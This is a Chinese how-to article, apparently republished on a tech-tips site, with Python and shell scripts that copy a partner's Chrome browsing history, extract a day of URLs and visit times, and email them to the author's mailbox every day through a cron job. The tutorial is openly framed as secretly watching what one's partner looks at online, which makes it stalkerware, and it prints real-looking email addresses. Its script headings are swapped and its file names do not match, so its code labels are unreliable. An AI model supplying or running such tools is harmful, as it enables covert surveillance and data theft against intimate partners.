溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的

發(fā)布時(shí)間:2020-07-15 14:22:00 來源:億速云 閱讀:232 作者:小豬 欄目:開發(fā)技術(shù)

小編這次要給大家分享的是Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的,文章內(nèi)容豐富,感興趣的小伙伴可以來了解一下,希望大家閱讀完這篇文章之后能夠有所收獲。

需求:

(1) 獲取你對(duì)象chrome前一天的瀏覽記錄中的所有網(wǎng)址(url)和訪問時(shí)間,并存在一個(gè)txt文件中

(2)將這個(gè)txt文件發(fā)送給指定的郵箱地址(你的郵箱)

(3)建立例行任務(wù),每天定時(shí)自動(dòng)完成這些操作,你就可以通過郵件查看你對(duì)象每天看啥了

準(zhǔn)備

  • macOS Sierra
  • Python3.6
  • Chrome

發(fā)送郵件的qq郵箱地址

qq郵箱授權(quán)碼

SMTP服務(wù)器地址 : smtp.qq.com

接受郵件的郵箱地址

執(zhí)行:

(1) 首先我們用DB Browser for SQLite來看下History中的urls表的數(shù)據(jù)組成

從表中可以看出,我們要的網(wǎng)址和訪問時(shí)間就在urls.url和urls.last_visit_time中

Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的

(2) get_history.py:

# -*- coding: utf-8 -*-
from email import encoders
from email.header import Header
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email.utils import parseaddr, formataddr
import smtplib
import argparse

# 1.文件執(zhí)行的需要的參數(shù)(result.txt)
parser = argparse.ArgumentParser()
parser.add_argument('affix_file',help='the path of the affix')
args = parser.parse_args()


# 2.格式化一個(gè)郵件地址和郵件信息
def _format_addr(s):
  name, addr = parseaddr(s)
  return formataddr((Header(name, 'utf-8').encode(), addr))

#連接服務(wù)器(這里大家好改成自己的!)
from_addr = "771568102@qq.com" #發(fā)件人郵箱
password = "xxxxxxxx" #發(fā)件人郵箱授權(quán)碼
to_addr = "2160802033@cnu.edu.cn" #收件人郵箱
smtp_server = "smtp.qq.com" #SMTP服務(wù)器地址

#郵件發(fā)件人名字、收件人名字、主題
msg = MIMEMultipart()
msg['From'] = _format_addr('風(fēng)一樣的女子 <%s>' % from_addr)
msg['To'] = _format_addr('風(fēng)一樣的男子 <%s>' % to_addr)
msg['Subject'] = Header('chrome歷史記錄每日更新', 'utf-8').encode()

# 郵件正文是MIMEText:
msg.attach(MIMEText('窺探隱私是犯法的啊!', 'plain', 'utf-8'))

# 添加附件就是加上一個(gè)MIMEBase,從本地讀取一個(gè)txt文件:
with open(args.affix_file, 'r') as f:
  # 設(shè)置附件的MIME和文件名,這里是py類型:
  mime = MIMEBase('result', 'txt', filename='result.txt')
  # 加上必要的頭信息:
  mime.add_header('Content-Disposition', 'attachment', filename='result.txt')
  mime.add_header('Content-ID', '<0>')
  mime.add_header('X-Attachment-Id', '0')
  # 把附件的內(nèi)容讀進(jìn)來:
  mime.set_payload(f.read())
  # 用Base64編碼:
  encoders.encode_base64(mime)
  # 添加到MIMEMultipart:
  msg.attach(mime)

#3.通過SMTP發(fā)送出去
server = smtplib.SMTP(smtp_server, 25)
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit()

通過這個(gè)腳本,我們可以把url和訪問時(shí)間提取出來,并且存儲(chǔ)在

result.txt中,下圖就是我得到的部分結(jié)果

Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的

(3) send_email.py:

# -*- coding: utf-8 -*-
import sqlite3

#大家要改成自己的路徑
history_db = '/Users/Marcel/Desktop/tmp/code/chrome_history/History'

# 1.連接history_db
c = sqlite3.connect(history_db)
cursor = c.cursor()


# 2.選取我們想要的網(wǎng)址和訪問時(shí)間
try:
  select_statement = "SELECT url,datetime(last_visit_time/1000000-11644473600,'unixepoch','localtime') AS tm FROM urls WHERE julianday('now') - julianday(tm) < 1 ORDER BY tm;"
  cursor.execute(select_statement)
except sqlite3.OperationalError:
  print("[!] The database is locked! Please exit Chrome and run the script again.")
  quit()

# 3.將網(wǎng)址和訪問時(shí)間存入result.txt文件
results = cursor.fetchall()
with open('/Users/Marcel/Desktop/tmp/code/chrome_history/result.txt','w') as f:#改成自己的路徑
  for i in range(len(results)):
    f.write(results[i][1]+'\n')
    f.write(results[i][0]+'\n')

通過這個(gè)腳本,我們可以把result.txt作為附件,發(fā)送給指定郵箱地

址,下圖是我得到的部分結(jié)果

Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的

(4) ./start.sh :其實(shí),前面幾個(gè)腳本,已經(jīng)完成了我們的任務(wù),但是每次都執(zhí)行這么多腳

本,太麻煩了,我們可以把這些腳本的執(zhí)行語句整理成一個(gè)shell腳本。

cp /Users/Marcel/Library/Application\ Support/Google/Chrome/Default/History /Users/Marcel/Desktop/tmp/code/chrome_history/
python /Users/Marcel/Desktop/tmp/code/chrome_history/get_history.py
python /Users/Marcel/Desktop/tmp/code/chrome_history/send_mail.py /Users/Marcel/Desktop/tmp/code/chrome_history/result.txt

這樣,我們?cè)诮K端執(zhí)行./start.sh,系統(tǒng)就會(huì)幫我們把這三條語句依次執(zhí)行了

注意:由于crontab命令需要絕對(duì)路徑,所以這里的路徑都是用絕對(duì)路徑

(5) crontab :如果使用了這個(gè)命令,在電腦開機(jī)并且聯(lián)網(wǎng)的情況,系統(tǒng)會(huì)自動(dòng)執(zhí)行,然后把結(jié)果發(fā)到你的郵箱

使用方法:在終端下輸入crontab -e,使用vim輸入下面一行代碼就可以了

20 14 * * * /Users/Marcel/Desktop/tmp/code/chrome_history/start.sh

說明:前面兩個(gè)數(shù)字,就是你每天執(zhí)行這個(gè)腳本的時(shí)間,我這里設(shè)置的是14:20。

重要的事再說一遍,一定要寫絕對(duì)路徑?。?/p>

看完這篇關(guān)于Python實(shí)時(shí)監(jiān)控網(wǎng)站瀏覽記錄是怎么實(shí)現(xiàn)的文章,如果覺得文章內(nèi)容寫得不錯(cuò)的話,可以把他分享出去給更多人看到。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI